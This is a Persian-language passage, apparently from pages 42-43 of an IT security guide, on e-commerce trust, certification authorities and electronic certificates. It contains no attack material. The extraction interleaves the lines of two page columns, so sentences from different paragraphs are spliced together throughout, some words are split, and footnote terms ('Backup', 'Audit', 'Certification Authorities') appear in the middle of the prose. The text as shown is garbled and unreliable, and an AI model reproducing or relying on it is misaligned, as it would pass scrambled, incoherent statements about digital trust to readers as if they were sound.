‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳـﺪ ﺍﺯ‬
‫ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺩﻧﺒﺎﻝ ﻧﺴﺨﻪ ﺍﺻﻠﻲ ﺁﻥ ﺑﻮﺩ‪ .‬ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ‬
‫ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﻣﺘﻔﺎﻭﺕ ﻧﻈﺎﺭﻩ ﺷـﻮﻧﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣـﺴﺘﻘﻞ ﻋﻤﻮﻣـﹰﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺻﻨﻌﺖ ﻣﻮﺳﻴﻘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭ ﻣﺤﻴﻄﻬﺎﻱ‬
‫ﻣﺤﺼﻮﻝﻣﺤﻮﺭ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻣﺤﻮﺭ ﻫﺴﺘﻨﺪ )ﻣﺜﻞ ﺍﻧﺒﺎﺭﺩﺍﺭﻱ‪ ،‬ﺳﻔﺎﺭﺷﺎﺕ ﻳـﺎ‬
‫ﺩﻳﮕﺮ ﻧﻴﺰ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺩ‪ ،‬ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻓـﻮﺕ ﻭ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﻧﻈﻴﺮ ﺗﻮﻟﻴﺪ‪ ،‬ﺛﺒﺖ ﺩﺭ ﺩﻓﺎﺗﺮ ﻋﻤـﻮﻣﻲ‪ ،‬ﻭ ﺣـﺴﺎﺑﻬﺎﻱ ﭘﺮﺩﺍﺧﺘﻨـﻲ ﻭ‬
‫ﻓﻨﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻳﺎ ﺩﻳﮕﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ‬
‫ﺩﺭﻳـﺎﻓﺘﻨﻲ(‪ ،‬ﺍﻣﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻮﻓﻖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺧﻂ ﺑـﻪ‬
‫ﺭﻭﺷﻬﺎﻳﻲ ﺗﻬﻴﻪ ﻭ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛـﻪ ﻣﻮﺟـﺐ ﺗﺨﺮﻳـﺐ ﺷـﺪﻳﺪ ﺁﻥ‬
‫ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﺮﺍﻱ‬
‫ﺗﺠﺎﺭﺕ ﻭ ﺻﻨﻌﺖ ﮔﺮﺩﺩ‪ .‬ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺑﺎ ﺍﺭﺯﺵ ﻧﻴﺎﺯ ﺑـﻪ ﺣﻔﺎﻇـﺖ‬
‫ﻛﺴﺐ ﻣﻮﻓﻘﻴﺖ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻃﺮﺍﺣـﻲ ﻣـﺸﺘﺮﻱﻣـﺪﺍﺭ ﺑﺎﺷـﺪ ﻭ‬
‫ﻛﺎﻓﻲ ﻭ ﻣﻨﺎﺳﺐ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﺳﻄﺢ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻗﺮﺍﺭ‬
‫ﺳﻴﺴﺘﻢ ﺑﻪ ﺗﻌﻘﻴـﺐ ﺭﻓﺘـﺎﺭ ﻣـﺸﺘﺮﻱ ﺩﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺟـﺴﺘﺠﻮ ﻭ‬
‫ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛﺎﺭ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﻗﺎﻟـﺐ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺤﺼﻮﻻﺕ‪ ،‬ﺍﺭﺍﺋﻪ ﺳﻔﺎﺭﺵ‪ ،‬ﺗﻜﻤﻴﻞ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣـﺎﻟﻲ ﻭ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﺑﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛﺎﺭ ﺩﺭ‬
‫ﺭﺩﮔﻴﺮﻱ ﻣﺤﺼﻮﻝ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺑﭙﺮﺩﺍﺯﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻧﮕﺮﺍﻧﻲ‬
‫ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺳﻨﺘﻲ ﺑﻪ ﺗﺠﺎﺭﺕ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺼﻮﻻﺕ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻫﻤﭽﻨﺎﻥ ﻣﻬـﻢ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺩﺭ‬
‫ﻞ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻘﻴﺐ ﺭﻓﺘﺎﺭ ﻣﺸﺘﺮﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﺍﻧﺠـﺎﻡ ﻫـﺮ‬
‫ﻣﻘﺎﺑ ﹺ‬
‫ﺑﺴﻮﻱ ﻣﻔﻬﻮﻡ ﻧﻮﻳﻨﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ‬
‫ﻣﻌﺎﻣﻠﻪﺍﻱ ﻛﻪ ﻣﺸﺘﺮﻱ ﺁﻧﺮﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨﺪ ﺩﺭ ﺍﻭﻟﻮﻳﺖ ﺑﻌـﺪﻱ‬
‫ﻣﺤﻴﻂ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺯ ﻣﺎ ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﺩﺭ ﺗﻌﺮﻳـﻒ ﺧـﻮﺩ ﺍﺯ‬ ‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﻣﺠﺪﺩ ﺑﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﻣﻮﻓﻘﻴـﺖ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺯﻧﮕﺮﻱ ﻛﻨﻴﻢ‪ .‬ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻴﺰﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺑـﻪ ﻳـﻚ‬ ‫‪63‬‬ ‫‪Backup‬‬
‫‪64‬‬ ‫‪Audit‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٢‬‬

‫ﻣﺮﻛﺰ ﺗﺎ ﻣﺮﻛﺰ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ؛ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﻼ ﺍﺯ‬
‫ﺷﺨﺺ‪ ،‬ﻳﻚ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﻳﺎ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ؛ ﻣـﺜ ﹰ‬
‫ﺑﻪ ﺍﺛﺒﺎﺕ ﻛﺎﻣﻞ ﻫﻮﻳﺖ ﺷﻤﺎ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺳﺎﻳﺮﻳﻦ‬ ‫ﺗﻄﺎﺑﻖ ﻣﺸﺎﻫﺪﺍﺕ ﻓﻌﻠﻲ ﺑﺎ ﺗﺠﺮﺑﻴﺎﺕ ﻭ ﺩﺍﻧـﺴﺘﻪﻫـﺎﻱ ﻗﺒﻠـﻲﻣـﺎﻥ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﻛﻪ ﺑﻴﺎﻥ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺑﭙﺬﻳﺮﻧﺪ‪.‬‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﻢ‪ .‬ﺣـﻴﻦ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﺑﻴﺸﺘ ﹺﺮ ﺷﺎﺧﺼﻬﺎﻱ ﻏﻴﺮ ﺷﻔﺎﻫﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺯ ﺩﺳـﺖ ﻣـﻲﺭﻭﻧـﺪ‪.‬‬
‫ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﻳـﻦ ﻣﺸﺨـﺼﺎﺕ ﺭﺍ ﺑـﻪ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨـﻴﻢ ﻳـﺎ ﺻـﻔﺤﺔ‬
‫ﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ .‬ﺳﻄﻮﺡ ﻣﺘﻌﺪﺩ ﺗﺄﻳﻴﺪ ﻫﻮﻳـﺖ ﺑـﺮﺍﻱ ﺩﺭﺟـﺎﺕ‬
‫ﻭﺑﻲ ﺭﺍ ﻣﻲﺧﻮﺍﻧﻴﻢ‪ ،‬ﻧﻤﻲﺗﻮﺍﻧﻴﻢ ﻫﻤﻴﺸﻪ ﺑﮕﻮﺋﻴﻢ ﻛﻪ ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﺨﺘﻠﻒ ﺍﻃﻤﻴﻨﺎﻥ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﮔﻮﺍﻫﻴﻬﺎ ﺗﻨﻬـﺎ‬
‫ﺩﻗﻴﻖ ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﺮﺩﻳﻢ ﻣﺸﺨﺺ ﻣﻲﺷﺪ ﻛـﻪ‬
‫ﺩﺭ ﺳﻄﺢ ﺧﻮﺩ ﻣﻌﺘﺒﺮ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻟﺬﺍﺳﺖ ﻛﻪ ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺻﺤﻴﺢ ﻧﻴﺴﺘﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲ ﺩﺍﻧﻴﻢ ﻛـﻪ ﺧﻄﺎﻫـﺎﻱ ﻭﺍﻗـﻊﺷـﺪﻩ‬
‫ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﻭﺟﻮﺩ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ‬
‫ﻧﺘﻴﺠﻪ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻳﺎ ﺗﻼﺷﻬﺎﻳﻲ ﺗﻌﻤﺪﻱ ﺑـﺮﺍﻱ ﻓﺮﻳـﺐ‬
‫ﺑﻪ ﺗﻤﺎﻣﻲ ﺍﻫﺪﺍﻑ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻛـﺎﻓﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﭼﻨـﺪﻳﻦ ﻣﺮﻛـﺰ‬
‫ﺩﺍﺩﻥ ﻣﺎ‪ .‬ﺩﺭ ﻏﻴﺎﺏ ﺍﻃﻼﻋﺎﺕ ﺣﺘـﻲ ﺩﻳﮕـﺮ ﻧﻤـﻲﺩﺍﻧـﻴﻢ ﻛـﻪ ﺁﻳـﺎ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎ‬
‫ﻧﻮﻳﺴﻨﺪﺓ ﻳﻚ ﭘﻴﺎﻡ ﻫﻤﺎﻥ ﺷﺨﺼﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋﺎﻱ ﺁﻧﺮﺍ‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﮔــﻮﺍﻫﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،٦٦‬ﺍﻳــﻦ ﮔﻮﺍﻫﻴﻬــﺎ ﻣــﻲﺗﻮﺍﻧﻨــﺪ‬
‫ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﻀﺎ ﺷﻮﻧﺪ ﻭ ﺍﻳﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ‬
‫ﻛــﻪ ﮔــﻮﺍﻫﻲ ﻣﻨﺘﻘــﻞ ﺷــﺪﻩ ﺻــﺤﻴﺢ ﻭ ﺣﻘﻴﻘــﻲ ﺍﺳــﺖ‪ .‬ﺍﻳــﻦ‬ ‫ﻣﺴﻠﻢ ﺍﺳﺖ ﻛﻪ ﻓﺮﻳﺒﻜﺎﺭﻱ ﺩﺭ ﺟﻬﺎﻥ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﺭﺥ ﻣـﻲ ﺩﻫـﺪ‪،‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺗﺠﺮﺑﻲ ﻭ ﺷـﻬﻮﺩﻱ ﻛـﻪ‬ ‫ﻻ ﺗﻌﻴـﻴﻦ ﺣﻘﻴﻘـﺖ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺍﻓـﺮﺍﺩ ﺑـﺼﻮﺭﺕ‬‫ﻭﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻣـﺴﺘﺤﻜﻢﺗـﺮ‬ ‫ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﻜﺎﻧﻬﺎ ﺑﺼﻮﺭﺕ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪.‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻋﺘﻤﺎﺩ ﻻﺯﻡ ﺟﻬـﺖ‬ ‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪ ٦٥‬ﺑـﻪ ﺍﻳـﻦ ﺑﻌـﺪ ﺍﺯ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣـﺎﻟﻲ‬ ‫ﺍﻣﻨﻴﺖ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﺯﻳﺎﺩﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺮﺍﻛﺰ ﺑـﺮﺍﻱ‬
‫ﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺭﻭﺷــﻬﺎﻱ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﻃـﻮﺭ ﺭﺳـﻤﻲ ﮔـﻮﺍﻫﻲ ﺻـﺎﺩﺭ‬
‫ﻣﺴﺘﺤﻜﻢﺗﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻣﻔﻬـﻮﻡ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺍﮔـﺮ‬
‫ﺩﻭﻟﺘﻬﺎ ﺩﺭ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﺑـﺮﺍﻱ‬ ‫ﮔﺬﺭﻧﺎﻣﺔ ﻣﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻳﻌﻨﻲ ﺩﻭﻟﺖ ﻳﻚ ﻛﺸﻮﺭ ﻫﻮﻳﺖ ﺷـﻤﺎ‬
‫ﻛﺎﺭﺍﻳﻲ ﻭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﻣﺪﻟﻬﺎﻱ ﺟﺪﻳﺪ ﺍﻋﺘﻤﺎﺩ ﻧﻘﺶ‬ ‫ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﻭ ﻟﺬﺍ ﮔﺬﺭﻧﺎﻣﻪ ﻧﺸﺎﻧﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﻴـﺪ‬
‫ﻣﻬﻤﻲ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ‬ ‫ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺍﮔﺮ‬
‫ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﺘﻪ ﺑﻪ ﻭﺟﻮﺩ ﺍﻳﻦ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌﻀﻲ‬ ‫ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺳﻴﻠﺔ ﻧﻘﻠﻴﺔ ﻣﻮﺗﻮﺭﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ‬
‫ﻛﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬﺎ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ‬ ‫ﻱ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ ﺷـﻤﺎ‬ ‫ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﻣﻠـﻲ ﻳـﺎ ﻧﺎﺣﻴـﻪﺍ ﹺ‬
‫ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻋﻤﻞ ﻛﻨﻨـﺪ ﻭ ﺩﺭ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬـﺎ‬ ‫ﻣﺠﻮﺯﻱ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﻛﻪ ﻫﻢ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻭ ﻫـﻢ‬
‫ﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻭﻇﻴﻔـﺔ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺑﺎﻳـﺪ ﺑـﻪ ﺑﺨـﺶ‬ ‫ﺟﻮﺍﺯ ﺭﺍﻧﻨـﺪﮔﻲ ﺑـﺎ ﻳـﻚ ﻭﺳـﻴﻠﺔ ﻧﻘﻠﻴـﻪ ﺭﺍ ﺑـﻪ ﺷـﻤﺎ ﻣـﻲﺩﻫـﺪ‪.‬‬
‫ﺧﺼﻮﺻﻲ ﻭﺍﮔﺬﺍﺭ ﺷﻮﺩ‪ .‬ﻣﺴﺘﻘﻞ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ‪ ،‬ﻫﺪﻑ ﺍﺯ‬ ‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻲﺩﻫﻨﺪ ﻧﻴـﺰ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﺗﺄﺳﻴﺲ ﺍﻳﻦ ﻣﺮﺍﻛـﺰ ﻭﺍﺿـﺢ ﺍﺳـﺖ‪ .‬ﺳﻴﺎﺳـﺖ ﺩﻭﻟـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ‬ ‫ﺻﺪﻭﺭ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣـﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﻛﺎﺭﻓﺮﻣـﺎ ﻳـﺎ‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺗﺴﻬﻴﻞ ﻛﻨﺪ ﺗﺎ ﺍﻓﺮﺍﺩ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ‬ ‫ﺁﻣﻮﺯﺷﮕﺎﻩ ﺷﻤﺎ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﺭﺕ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﻲ‬
‫ﻛــﺎﺭﺑﺮﺍﻥ ﻣﻨﻔــﺮﺩ ﺁﻥ ﻗــﺎﺩﺭ ﺑﺎﺷــﻨﺪ ﺩﺭ ﺗﺠــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــ ﹺ‬ ‫ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﻭ ﺁﻥ ﻛﺎﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺳﺘﺮﺳﻲ ﺷﻤﺎ ﺭﺍ ﺑـﻪ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻢ ﻣﺸﺎﺭﻛﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺳﺮﻭﻳﺴﻬﺎﻱ ﺧﺎﺻﻲ ﻛﻪ ﻣﺨﺼﻮﺹ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻳـﺎ ﺩﺍﻧـﺸﺠﻮﻳﺎﻥ‬
‫ﻳﻚ ﺣﻮﺯﺓ ﺧﺎﺹ ﻫﺴﺘﻨﺪ ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ‬
‫ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ﺍﺯ ﺗﺄﻳﻴـﺪ ﺷـﻤﺎ‬
‫ﻫﺪﻑ ﺧﺎﺻﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺟﺎﻣﻌﻴﺖ ﺗﺄﻳﻴﺪ ﻫﻮﻳﺖ ﺍﺯ ﻳـﻚ‬

‫‪66‬‬ ‫‪Electronic Certification‬‬ ‫‪65‬‬ ‫‪Certification Authorities‬‬


‫‪٤٣‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨـﺔ‬ ‫ﺟﻤﻊﺑﻨﺪﻱ‬


‫ﺍﻣﻨﻴﺖ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻮﻗﻌﻴﺖ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

